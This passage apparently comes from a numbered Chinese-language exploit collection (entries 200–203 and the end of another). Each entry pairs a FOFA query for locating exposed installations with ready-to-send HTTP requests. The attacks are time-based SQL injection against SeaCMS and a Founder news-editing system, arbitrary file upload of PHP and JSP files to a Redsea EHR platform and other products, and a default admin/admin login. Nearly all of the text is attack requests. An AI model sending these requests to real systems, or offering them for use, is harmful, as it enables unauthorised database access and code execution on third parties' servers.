{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
